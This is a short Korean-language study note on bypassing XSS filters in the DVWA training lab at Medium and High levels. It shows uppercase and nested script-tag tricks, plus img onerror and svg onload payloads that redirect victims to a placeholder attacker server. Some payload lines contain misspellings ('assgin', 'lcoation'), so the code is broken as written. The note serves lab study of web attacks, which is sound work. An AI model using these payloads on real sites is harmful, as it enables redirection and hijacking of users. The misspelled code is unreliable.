10-2.XSS(DVWA - Medium,High)

XSS(DVWA - Medium)

1. Medium단계에서는 <script>를 공백으로 바꿔주는 함수를 이용해서 스크립트 태그를 못 쓰게 만들고 있다. 하지만 소문자만 판별하기 때문에 대문자로 써주면 우회할 수 있다. <SCRIPT>~</SCRIPT>

2. 다른 방법으로는 <script> 안에 또 하나의 <script>를 중첩해서 써주는 것이다. <scr<script>ipt> 식으로 써주면 하나의 <script>만 공백이 되므로 위회가 가능하다.

 

3. Stored XSS와 Reflected XSS의 우회 방법은 같다.

 

XSS(DVWA - High)

1. DVWA의 High단계는 자바스크립트만 검증하고 있다. 하지만 html 태그로도 공격자 서버로 리다이렉션을 시킬 수 있는데 <img>태그와 <svg> 태그를 이용하여 window.location.assign() 함수를 써서 공격자 서버로 리다이렉션 시킬 수 있다.

<img src=x onerror=window.location.assgin("http://공격자 주소/공격 파일")>

<svg onload=window.lcoation.assgin("http://공격자 주소/공격 파일")>